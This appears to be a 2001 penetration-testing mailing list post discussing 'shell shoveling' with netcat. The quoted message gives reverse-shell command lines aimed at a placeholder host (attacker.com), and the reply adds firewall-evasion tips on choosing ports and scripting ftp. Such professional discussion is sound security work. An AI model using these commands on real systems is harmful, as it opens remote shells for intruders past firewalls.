Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re:Shell Shoveling?!?

From: "bluefur0r bluefur0r" <bluefur0r () drea ms>
Date: 2 Oct 2001 19:05:44 -0000
Thats rather amusing, because i used that exact command last night... Except i changed the ports because of firewall 
reasons... The reason I had to use it because they were running BlackIce on the webserver and a fw1 box was in front of 
that as well. A misconfigured Firewall allowed out bound transmissions, and hence that exact command came into play. I 
suggest trying higher ports and not using port 80, i bet you 5 Dollars if you attempt to setup a listener on port 80 
you'll get hit with nimda before your shell gets to you =). It worked quite well except do not try using commands like 
ftp (it seemed to mess with my listeners a bit. Instead use the ol' ftp -s: switch and create a file with the list of 
ftp commands. Hope this helps!
blue
Op Tue, 2 Oct 2001 11:15:28 -0700  "Junginger, Jeremy" <jjunginger () Calence com> geschreven:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have you guys ever heard of shell shoveling? In playing with NetCat
and reading an infoworld article, I came across a couple of concepts
that I found fascinating.  Below are the explanations and command
lines:

"If the attacker machine is listening with netcat on TCP 80 and 25,
and TCP 80 is allowed inbound and 25 outbound to/from the victim
through the firewall, then this command "shovels" a remote command
shell from victim to attacker.com."

nc attacker.com 80 | cmd.exe | nc attacker.com 25

"If Xterm (TCP 6000) is allowed outbound without restriction, then
the following command would be a nifty Unix equivalent to the above
example:"

xterm -display attacker.com:0.0 &

I am planning on using this in an upcomint p.t. and wanted to gain
your insights!  Thanks!



-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO7oEDKlk83sSWEI4EQJT5gCgoed9mdrH4FMkU1vse5zBg1fkiqcAnAsv
0Em+lFGcjjX00Jd6eTEGSSFw
=BUzY
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/




=================================================================
Kies een origineel e-mailadres op www.emails.nl

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Previous By Date Next
Previous By Thread Next

Current thread: